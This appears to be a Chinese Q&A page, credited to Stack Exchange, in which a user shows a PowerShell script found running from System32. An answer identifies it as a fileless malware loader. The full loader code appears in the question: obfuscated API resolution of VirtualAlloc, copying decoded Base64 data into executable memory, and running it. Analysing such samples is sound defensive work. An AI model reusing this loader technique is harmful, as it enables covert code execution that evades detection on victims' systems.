You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

这款自动周期性运行的PowerShell脚本是否为恶意程序?

脚本功能分析与恶意判定咨询

我通过Process Explorer追踪进程命令行参数,发现路径为C:\Windows\System32\8208c741-a361-4e21-83e2-6d7f9a3b5b89.ps1的PowerShell脚本会周期性自动运行(我不熟悉PowerShell)。脚本开头包含多个以$dat +=开头的超长字符串,脚本代码如下:

$assemblies = New-Object -TypeName System.Collections.Generic.Dictionary'[string, System.Reflection.Assembly]' -ArgumentList ([StringComparer]::OrdinalIgnoreCase)
foreach ($assembly in ([AppDomain]::CurrentDomain.GetAssemblies())) {
    $assemblies[[System.IO.Path]::GetFileName($assembly.Location)] = $assembly;
}

function Get-Ptr {
    param (
        [IntPtr]
        $ptr,
        [type[]]
        $params,
        [type]
        $rettype
    )
    $bu = [AppDomain]::CurrentDomain.DefineDynamicAssembly([System.Reflection.AssemblyName]::new(('_' + [guid]::NewGuid().ToString())), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(('_' + [guid]::NewGuid().ToString()), $false).DefineType(('_' + [guid]::NewGuid().ToString()), 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);
    $bu.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $params).SetImplementationFlags('Runtime, Managed');
    $bu.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $rettype, $params).SetImplementationFlags('Runtime, Managed');
    $del = $bu.CreateType();
    return [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptr, $del);
}

function Get-Func {
    param (
        [string]
        $module,
        [string]
        $name,
        [type[]]
        $params,
        [type]
        $rettype
    )
    $na = $assemblies['System.dll'].GetType(('Microsoft' + '.Win32.' + 'UnsafeN' + 'ativeMethods'));
    $gp = $na.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'));
    $md = $na.GetMethod('GetModuleHandle').Invoke($null, @($module));
    $ptr = $gp.Invoke($null, @(([System.Runtime.InteropServices.HandleRef]::new([object]::new(), $md)), $name));
    return Get-Ptr $ptr $params $rettype;
}

$fname = 'V';
$fname += 'i';
$fname += 'r';
$fname += 't';
$fname += 'u';
$fname += 'a';
$fname += 'l';
$fname += 'A';
$fname += 'l';
$fname += 'l';
$fname += 'o';
$fname += 'c';
$func = Get-Func 'Kernel32.dll' $fname @([IntPtr], [IntPtr], [uint32], [uint32]) ([IntPtr]);

$dat = [Convert]::FromBase64String($dat);
$patch = $func.Invoke(0, 8208, 12288, 64);
[Runtime.InteropServices.Marshal]::Copy($dat, 0, $patch, 8208);
$patchfunc = Get-Ptr $patch @([uint32], [IntPtr], [IntPtr], [IntPtr]) ([IntPtr]);
$patch2 = [Runtime.InteropServices.Marshal]::AllocHGlobal(95232);
[Runtime.InteropServices.Marshal]::Copy($dat, 8208, $patch2, 95232);
$patchfunc.Invoke(0, $patch2, 1, 0);

while($true)
{
    Start-Sleep 10
}

该脚本运行后似乎会与System32\drivers\VwA5N1xq4w.sys和System32\drivers\4mscxjme2.sys文件交互;这些文件内仅包含大量如下格式的日志内容:

08/23/2021 00:24:32.582 [506]: Failed to load dependency Microsoft.AnalysisServices.AdomdClient of assembly Microsoft.ReportingServices.DataExtensions, Version=2020.13.0.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91 because of the following error : Die gefundene Manifestdefinition der Assembly stimmt nicht mit dem Assemblyverweis überein. (Ausnahme von HRESULT: 0x80131040
08/23/2021 00:24:32.582 [507]: Failed to load dependency Microsoft.AnalysisServices.AdomdClient of assembly Microsoft.ReportingServices.DataExtensions, Version=2020.13.0.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91 because of the following error : Die gefundene Manifestdefinition der Assembly stimmt nicht mit dem Assemblyverweis überein. (Ausnahme von HRESULT: 0x80131040

现咨询该脚本的具体功能及是否属于恶意程序。


脚本功能分析

  • 内存恶意代码加载执行:
    脚本通过字符拼接方式调用kernel32.dll的VirtualAlloc函数,在进程内存中分配可执行区域;随后将Base64解码后的二进制数据写入该内存区域,再将内存地址转为可执行函数指针并调用,本质是加载执行内存中的未知代码。
  • 持久化驻留:
    脚本末尾通过无限循环+10秒休眠的逻辑维持进程运行,防止自身退出,实现系统内的持续驻留。
  • 驱动文件混淆:
    脚本调用的内存代码会与System32\drivers下的两个随机命名驱动交互,但驱动内的日志是.NET程序集加载失败的错误信息(德语提示意为“程序集清单定义与引用不匹配”),属于无关内容,目的是混淆真实功能。

恶意判定

该脚本属于典型恶意程序,理由如下:

  • 反检测手段:用字符拼接函数名、Base64编码payload的方式躲避静态查杀;
  • 无文件执行特性:将恶意代码写入内存直接执行,避免在磁盘留下完整样本;
  • 异常命名与路径:脚本和驱动使用随机GUID/无意义字符串命名,且存放在System32这类系统目录,不符合正常系统文件规范;
  • 可疑操作行为:调用原生内存分配函数并执行未知内存代码,这类操作常见于木马、挖矿程序或间谍软件。

建议立即终止相关进程,删除对应脚本和驱动文件,并进行全面系统病毒扫描。


内容的提问来源于stack exchange,提问作者cvdx

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.07.04 05:35:08